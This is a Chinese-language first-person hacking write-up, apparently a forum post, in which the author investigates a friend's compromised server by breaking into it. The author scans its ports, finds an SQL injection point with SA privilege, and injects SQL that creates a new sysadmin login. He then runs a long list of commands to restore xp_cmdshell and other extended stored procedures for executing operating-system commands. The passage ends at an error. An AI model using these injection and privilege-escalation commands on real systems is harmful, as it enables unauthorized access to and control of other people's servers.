笔者的一位朋友应聘到一家公司做网管，据说整个机房就他们俩人，工作很轻松。几乎是没什么事做，但是昨天突然给我打电话说是机房被入侵了，被人加了很多用户并且什么cain，arpspoof全都丢到服务器上了，想让笔者帮忙看看是怎么渗透进去的，于是乎在敲诈了一顿烤鸭之后笔者终于出手了。在经过朋友的同意之后特意将本文写出来!

　　这哥们也够狠，除了丢给我个IP其他什么都没给我!IP是202.108.59.XX。没办法，自食其力。用superscan扫了下，发现开了21.80.1433 这三个端口，因为我只扫1-3389 。并没看见终端的3389。看来这家伙是怕了，直接把3389给关掉了。 用旁注的工具检测了下，发现服务器有两个网站。两个都是ASP的站，不用多说了。先寻找注射点吧，使用两个啊D都打开google 搜索site:xxxx.com，一页显示一百条，扫了半天只发现一个站有注射点，居然还是SA权限!不被黑才怪!

　　既然是SA权限，马上准备传个VBS上去，先开了3389在说，但是搞了半天居然用啊D不能列目录!telnet了一下目标服务器的1433发现端口可以外连，于是在注射点后面使用：

　　exec master.dbo.sp_addlogin sadfish fish;

　　exec master.dbo.sp_addsrvrolemember sadfish,sysadmin

　　来添加一个用户名为sadfish密码为fish的SQL server用户权限为SA 。在页面执行两次都返回成功，说明添加成功了，马上打开查询分析器连上，成功连接，但是所有的存储过程都被删掉了。

　　于是马上想到恢复存储过程来执行命令，于是在查询分析器里执行:

　　use master

　　exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'

　　exec sp_addextendedproc xp_dirtree,'xpstar.dll'

　　exec sp_addextendedproc xp_enumgroups,'xplog70.dll'

　　exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'

　　exec sp_addextendedproc xp_loginconfig,'xplog70.dll'

　　exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'

　　exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'

　　exec sp_addextendedproc sp_OACreate,'odsole70.dll'

　　exec sp_addextendedproc sp_OADestroy,'odsole70.dll'

　　exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'

　　exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'

　　exec sp_addextendedproc sp_OAMethod,'odsole70.dll'

　　exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'

　　exec sp_addextendedproc sp_OAStop,'odsole70.dll'

　　exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'

　　exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'

　　exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'

　　exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'

　　exec sp_addextendedproc xp_regread,'xpstar.dll'

　　exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'

　　exec sp_addextendedproc xp_regwrite,'xpstar.dll'

　　exec sp_addextendedproc xp_availablemedia,'xpstar.dll'

　　就是将以上的存储过程全部恢复，但是在执行的时候却提示没能找到sp_addextendedproc